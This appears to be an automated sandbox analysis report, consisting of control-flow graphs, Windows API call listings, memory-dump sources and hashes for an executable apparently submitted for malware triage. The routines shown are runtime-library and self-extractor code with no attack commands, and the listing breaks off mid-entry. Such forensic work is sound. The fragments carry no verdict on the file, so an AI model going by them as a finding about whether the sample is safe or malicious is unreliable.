                  control_flow_graph 870 5ba058-5ba071 871 5ba073-5ba083 call 5be6ed 870->871 872 5ba087-5ba08c 870->872 871->872 879 5ba085 871->879 874 5ba099-5ba0bd MultiByteToWideChar 872->874 875 5ba08e-5ba096 872->875 877 5ba0c3-5ba0cf 874->877 878 5ba250-5ba263 call 5aec4a 874->878 875->874 880 5ba123 877->880 881 5ba0d1-5ba0e2 877->881 879->872 883 5ba125-5ba127 880->883 884 5ba101-5ba112 call 5b8518 881->884 885 5ba0e4-5ba0f3 call 5c1a30 881->885 888 5ba12d-5ba140 MultiByteToWideChar 883->888 889 5ba245 883->889 884->889 895 5ba118 884->895 885->889 898 5ba0f9-5ba0ff 885->898 888->889 892 5ba146-5ba158 call 5ba72c 888->892 893 5ba247-5ba24e call 5ba2c0 889->893 900 5ba15d-5ba161 892->900 893->878 899 5ba11e-5ba121 895->899 898->899 899->883 900->889 902 5ba167-5ba16e 900->902 903 5ba1a8-5ba1b4 902->903 904 5ba170-5ba175 902->904 905 5ba200 903->905 906 5ba1b6-5ba1c7 903->906 904->893 907 5ba17b-5ba17d 904->907 910 5ba202-5ba204 905->910 908 5ba1c9-5ba1d8 call 5c1a30 906->908 909 5ba1e2-5ba1f3 call 5b8518 906->909 907->889 911 5ba183-5ba19d call 5ba72c 907->911 914 5ba23e-5ba244 call 5ba2c0 908->914 924 5ba1da-5ba1e0 908->924 909->914 926 5ba1f5 909->926 910->914 915 5ba206-5ba21f call 5ba72c 910->915 911->893 923 5ba1a3 911->923 914->889 915->914 927 5ba221-5ba228 915->927 923->889 928 5ba1fb-5ba1fe 924->928 926->928 929 5ba22a-5ba22b 927->929 930 5ba264-5ba26a 927->930 928->910 931 5ba22c-5ba23c WideCharToMultiByte 929->931 930->931 931->914 932 5ba26c-5ba273 call 5ba2c0 931->932 932->893
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005B4E35,005B4E35,?,?,?,005BA2A9,00000001,00000001,3FE85006), ref: 005BA0B2
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005BA2A9,00000001,00000001,3FE85006,?,?,?), ref: 005BA138
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005BA232
                  • __freea.LIBCMT ref: 005BA23F
                    • Part of subcall function 005B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005BC13D,00000000,?,005B67E2,?,00000008,?,005B89AD,?,?,?), ref: 005B854A
                  • __freea.LIBCMT ref: 005BA248
                  • __freea.LIBCMT ref: 005BA26D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: 19c98f742ff07d012fade36dc34a08f881b2c0e6911a8e78e80efd2429c0ffb5
                  • Instruction ID: 89c8eae216a4925b214c5a5654f24e0c3134aa082b4e7379392a0dfe6681fc53
                  • Opcode Fuzzy Hash: 19c98f742ff07d012fade36dc34a08f881b2c0e6911a8e78e80efd2429c0ffb5
                  • Instruction Fuzzy Hash: F651CE72610216AFEB259E74CC46EFBBFAAFB84750F144629FD05D6140EB35EC40C6A2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 935 5aa2c7-5aa2e6 GetClassNameW 936 5aa2e8-5aa2fd call 5a17ac 935->936 937 5aa30e-5aa310 935->937 942 5aa2ff-5aa30b FindWindowExW 936->942 943 5aa30d 936->943 938 5aa31b-5aa31f 937->938 939 5aa312-5aa314 937->939 939->938 942->943 943->937
                  APIs
                  • GetClassNameW.USER32(?,?,00000050), ref: 005AA2DE
                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 005AA315
                    • Part of subcall function 005A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0059BB05,00000000,.exe,?,?,00000800,?,?,005A85DF,?), ref: 005A17C2
                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 005AA305
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                  • String ID: @Ut$EDIT
                  • API String ID: 4243998846-2065656831
                  • Opcode ID: b86c51799f0487dcedc34cdeb33795673fa1a583f79884be2edea918aaf14e29
                  • Instruction ID: 2a52bca6d02ef38ff9b5bc4c13061a97424a2b1f8ff3edb0d320575e4101e239
                  • Opcode Fuzzy Hash: b86c51799f0487dcedc34cdeb33795673fa1a583f79884be2edea918aaf14e29
                  • Instruction Fuzzy Hash: 06F08272A016287BEB205664AC09FAF7BACAF47B50F040456BD05E2180DB649945C6F6

                  Control-flow Graph

                  APIs
                    • Part of subcall function 005A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005A00A0
                    • Part of subcall function 005A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0059EB86,Crypt32.dll,00000000,0059EC0A,?,?,0059EBEC,?,?,?), ref: 005A00C2
                  • OleInitialize.OLE32(00000000), ref: 005AA34E
                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 005AA385
                  • SHGetMalloc.SHELL32(005D8430), ref: 005AA38F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                  • String ID: riched20.dll$3Qo
                  • API String ID: 3498096277-4232643773
                  • Opcode ID: b31584012d1159afcf7f5490c630dd4a38b2bf6b5dfa5af43d480e441d3f43d6
                  • Instruction ID: d2721bd257549f15193a9edcfd617c9a14d6c41e76f899825bdfe4ac5df4f180
                  • Opcode Fuzzy Hash: b31584012d1159afcf7f5490c630dd4a38b2bf6b5dfa5af43d480e441d3f43d6
                  • Instruction Fuzzy Hash: A2F0ECB1D4020AABDB10AF9998499EFFFFCFF95705F00415AE814E2240DBB85649CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 948 5999b0-5999d1 call 5ae360 951 5999dc 948->951 952 5999d3-5999d6 948->952 954 5999de-5999fb 951->954 952->951 953 5999d8-5999da 952->953 953->954 955 5999fd 954->955 956 599a03-599a0d 954->956 955->956 957 599a0f 956->957 958 599a12-599a31 call 5970bf 956->958 957->958 961 599a39-599a57 CreateFileW 958->961 962 599a33 958->962 963 599a59-599a7b GetLastError call 59b66c 961->963 964 599abb-599ac0 961->964 962->961 973 599aaa-599aaf 963->973 974 599a7d-599a9f CreateFileW GetLastError 963->974 966 599ae1-599af5 964->966 967 599ac2-599ac5 964->967 968 599b13-599b1e 966->968 969 599af7-599b0f call 59fe56 966->969 967->966 971 599ac7-599adb SetFileTime 967->971 969->968 971->966 973->964 978 599ab1 973->978 976 599aa1 974->976 977 599aa5-599aa8 974->977 976->977 977->964 977->973 978->964
                  APIs
                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,005978AD,?,00000005,?,00000011), ref: 00599A4C
                  • GetLastError.KERNEL32(?,?,005978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00599A59
                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,005978AD,?,00000005,?), ref: 00599A8E
                  • GetLastError.KERNEL32(?,?,005978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00599A96
                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,005978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00599ADB
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: File$CreateErrorLast$Time
                  • String ID:
                  • API String ID: 1999340476-0
                  • Opcode ID: c66f1a5902dce5905966a499821c084c3f33bdf2a303bec2a66b68f2b36f599d
                  • Instruction ID: 1fa3bf298eac35e41f29ef7fb3968269fec1e68bd1d27ab84d39db3254010a97
                  • Opcode Fuzzy Hash: c66f1a5902dce5905966a499821c084c3f33bdf2a303bec2a66b68f2b36f599d
                  • Instruction Fuzzy Hash: 27413371544B466FEB208B28CC0ABDABFD4FB45324F10071DF9E4961D1E7B5A988CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1007 5aac74-5aac8d PeekMessageW 1008 5aacc8-5aaccc 1007->1008 1009 5aac8f-5aaca3 GetMessageW 1007->1009 1010 5aacb4-5aacc2 TranslateMessage DispatchMessageW 1009->1010 1011 5aaca5-5aacb2 IsDialogMessageW 1009->1011 1010->1008 1011->1008 1011->1010
                  APIs
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005AAC85
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005AAC96
                  • IsDialogMessageW.USER32(00010406,?), ref: 005AACAA
                  • TranslateMessage.USER32(?), ref: 005AACB8
                  • DispatchMessageW.USER32(?), ref: 005AACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchPeekTranslate
                  • String ID:
                  • API String ID: 1266772231-0
                  • Opcode ID: cc09e6910d1bbfa99fc6f5fdeff926757d0be96f08674bc9c81f92d5b618a7c1
                  • Instruction ID: d190fa610cca4f7d70d57e5733a4415757cca4868119e6cdd41b51f2099e59ee
                  • Opcode Fuzzy Hash: cc09e6910d1bbfa99fc6f5fdeff926757d0be96f08674bc9c81f92d5b618a7c1
                  • Instruction Fuzzy Hash: 85F0BDB290212AAB9B209FE6DC4CDFF7F6CEE16261B404415F515D2110EF28D909DBB1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1012 5b76bd-5b76ca 1013 5b76e8-5b7711 call 5bb290 GetModuleFileNameA 1012->1013 1014 5b76cc-5b76d0 1012->1014 1020 5b7718 1013->1020 1021 5b7713-5b7716 1013->1021 1014->1013 1015 5b76d2-5b76e3 call 5b895a call 5b8839 1014->1015 1027 5b77dc-5b77e0 1015->1027 1022 5b771a-5b7744 call 5b77e1 call 5b7956 1020->1022 1021->1020 1021->1022 1030 5b7752-5b776f call 5b77e1 1022->1030 1031 5b7746-5b7750 call 5b895a 1022->1031 1037 5b7771-5b777e 1030->1037 1038 5b7787-5b779a call 5bada3 1030->1038 1036 5b7783-5b7785 1031->1036 1039 5b77d1-5b77db call 5b84de 1036->1039 1037->1036 1043 5b779c-5b779f 1038->1043 1044 5b77a1-5b77aa 1038->1044 1039->1027 1046 5b77c7-5b77ce call 5b84de 1043->1046 1047 5b77ac-5b77b2 1044->1047 1048 5b77b4-5b77c1 1044->1048 1046->1039 1047->1047 1047->1048 1048->1046
                  APIs
                  • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\5Ixz5yVfS7.exe,00000104), ref: 005B76FD
                  • _free.LIBCMT ref: 005B77C8
                  • _free.LIBCMT ref: 005B77D2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Users\user\Desktop\5Ixz5yVfS7.exe
                  • API String ID: 2506810119-1928915766
                  • Opcode ID: 03dbb69dd1948e4a7e2bfe6ae9f8848b157f246561d7d6186f0095acc8ed268c
                  • Instruction ID: edcb0281b658e3979893c48e7e698523f14688f3705a475769ac759bd03b3e25
                  • Opcode Fuzzy Hash: 03dbb69dd1948e4a7e2bfe6ae9f8848b157f246561d7d6186f0095acc8ed268c
                  • Instruction Fuzzy Hash: F1318D71A04619EFDB219F999C859EEBFECFBD8310F244066E404D7601DA706E44DB94

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1051 5ad287-5ad2b2 call 5ae360 SetEnvironmentVariableW call 59fbd8 1055 5ad2b7-5ad2bb 1051->1055 1056 5ad2df-5ad2e3 1055->1056 1057 5ad2bd-5ad2c1 1055->1057 1058 5ad2ca-5ad2d1 call 59fcf1 1057->1058 1061 5ad2c3-5ad2c9 1058->1061 1062 5ad2d3-5ad2d9 SetEnvironmentVariableW 1058->1062 1061->1058 1062->1056
                  APIs
                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 005AD29D
                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 005AD2D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: EnvironmentVariable
                  • String ID: sfxcmd$sfxpar
                  • API String ID: 1431749950-3493335439
                  • Opcode ID: 9d5ad181a042ef67ac26e4c6edf34184941452d9d01fc6d3ae064a8cb676cd18
                  • Instruction ID: 1a77453ffef91dc5f520949a31cb1130ecb010abc07d7c02e1217b9ded65432c
                  • Opcode Fuzzy Hash: 9d5ad181a042ef67ac26e4c6edf34184941452d9d01fc6d3ae064a8cb676cd18
                  • Instruction Fuzzy Hash: 28F0A77180062CAACB203FD09C0EFBE7F69BF1A741B044416FC85A6141D660DD40D7F1
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 0059985E
                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00599876
                  • GetLastError.KERNEL32 ref: 005998A8
                  • GetLastError.KERNEL32 ref: 005998C7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ErrorLast$FileHandleRead
                  • String ID:
                  • API String ID: 2244327787-0
                  • Opcode ID: 3fb876bf4d3ec6e745b38ee4e75bfe049443bbc1e14d572f1e3d167b24463988
                  • Instruction ID: f24ac1ff96ff8a4f7ed738a1739c234bb9d7f9da27057298dc42ed76d90501f6
                  • Opcode Fuzzy Hash: 3fb876bf4d3ec6e745b38ee4e75bfe049443bbc1e14d572f1e3d167b24463988
                  • Instruction Fuzzy Hash: BE11CE31900608EFDF205B59C808AB93FACFB92731F10C52EF82A95580D7359E449F52
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0059CFE0,00000000,00000000,?,005BA49B,0059CFE0,00000000,00000000,00000000,?,005BA698,00000006,FlsSetValue), ref: 005BA526
                  • GetLastError.KERNEL32(?,005BA49B,0059CFE0,00000000,00000000,00000000,?,005BA698,00000006,FlsSetValue,005C7348,005C7350,00000000,00000364,?,005B9077), ref: 005BA532
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,005BA49B,0059CFE0,00000000,00000000,00000000,?,005BA698,00000006,FlsSetValue,005C7348,005C7350,00000000), ref: 005BA540
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 496d05785516ca3d0a0ec375d8d4d34b99938a947c21edbe1fa815c8c02033c9
                  • Instruction ID: 1d34487a1aa45a64947fc28cbebccb68ad1b16473edd2731a754b36fce8835cb
                  • Opcode Fuzzy Hash: 496d05785516ca3d0a0ec375d8d4d34b99938a947c21edbe1fa815c8c02033c9
                  • Instruction Fuzzy Hash: F501F732611626AFCF318A7C9C48EE67F58BF55BA1B244520F906D31C0D721EB04CAE1
                  APIs
                    • Part of subcall function 005B8FA5: GetLastError.KERNEL32(?,005D0EE8,005B3E14,005D0EE8,?,?,005B3713,00000050,?,005D0EE8,00000200), ref: 005B8FA9
                    • Part of subcall function 005B8FA5: _free.LIBCMT ref: 005B8FDC
                    • Part of subcall function 005B8FA5: SetLastError.KERNEL32(00000000,?,005D0EE8,00000200), ref: 005B901D
                    • Part of subcall function 005B8FA5: _abort.LIBCMT ref: 005B9023
                    • Part of subcall function 005BB2AE: _abort.LIBCMT ref: 005BB2E0
                    • Part of subcall function 005BB2AE: _free.LIBCMT ref: 005BB314
                    • Part of subcall function 005BAF1B: GetOEMCP.KERNEL32(00000000,?,?,005BB1A5,?), ref: 005BAF46
                  • _free.LIBCMT ref: 005BB200
                  • _free.LIBCMT ref: 005BB236
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _free$ErrorLast_abort
                  • String ID: \
                  • API String ID: 2991157371-1951137136
                  • Opcode ID: 85c8741a4a93095362f7a83175bbb8aebea7a2dee251dba1d981a3e8b6cc58c7
                  • Instruction ID: 87248ffd9fe581163d12e57bcb3f40ff18b7f9a5eb0396b73e738edf4ac55f66
                  • Opcode Fuzzy Hash: 85c8741a4a93095362f7a83175bbb8aebea7a2dee251dba1d981a3e8b6cc58c7
                  • Instruction Fuzzy Hash: 4A319131904209AFEB10EFA9D845AEDBFE5FF85320F254099E4149B291EBF2AD41CB50
                  APIs
                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0059CC94,00000001,?,?,?,00000000,005A4ECD,?,?,?), ref: 00599F4C
                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,005A4ECD,?,?,?,?,?,005A4972,?), ref: 00599F8E
                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0059CC94,00000001,?,?), ref: 00599FB8
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: FileWrite$Handle
                  • String ID:
                  • API String ID: 4209713984-0
                  • Opcode ID: 61bf4f7f6cbb75a46b9bc899c72c0a80cb9e5c38c441bc3b0002f6ba4737f2f0
                  • Instruction ID: 445aa9040e36ac451a28be9fc12f1ca0ffe86d3dc9973aad31580aeb09f10700
                  • Opcode Fuzzy Hash: 61bf4f7f6cbb75a46b9bc899c72c0a80cb9e5c38c441bc3b0002f6ba4737f2f0
                  • Instruction Fuzzy Hash: C231C2712083059FDF258F28D948B6AFFA8FB94710F048A5DF9459A281CB75D948CBB2
                  APIs
                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A22E
                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A261
                  • GetLastError.KERNEL32(?,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A27E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CreateDirectory$ErrorLast
                  • String ID:
                  • API String ID: 2485089472-0
                  • Opcode ID: 11832d0e7ef50557b4c683d09054f2a76d69db022e7a94d36315fcbd306e1e61
                  • Instruction ID: ab7816d515c7385d512c144d09235111907ee5d68f9c011137dc54bfd7bb8b0d
                  • Opcode Fuzzy Hash: 11832d0e7ef50557b4c683d09054f2a76d69db022e7a94d36315fcbd306e1e61
                  • Instruction Fuzzy Hash: C901D23914061966EF32AB744C0DBEE3B48BF46B81F084851F800E5051DB66DA40D6F3
                  APIs
                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 005BB019
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
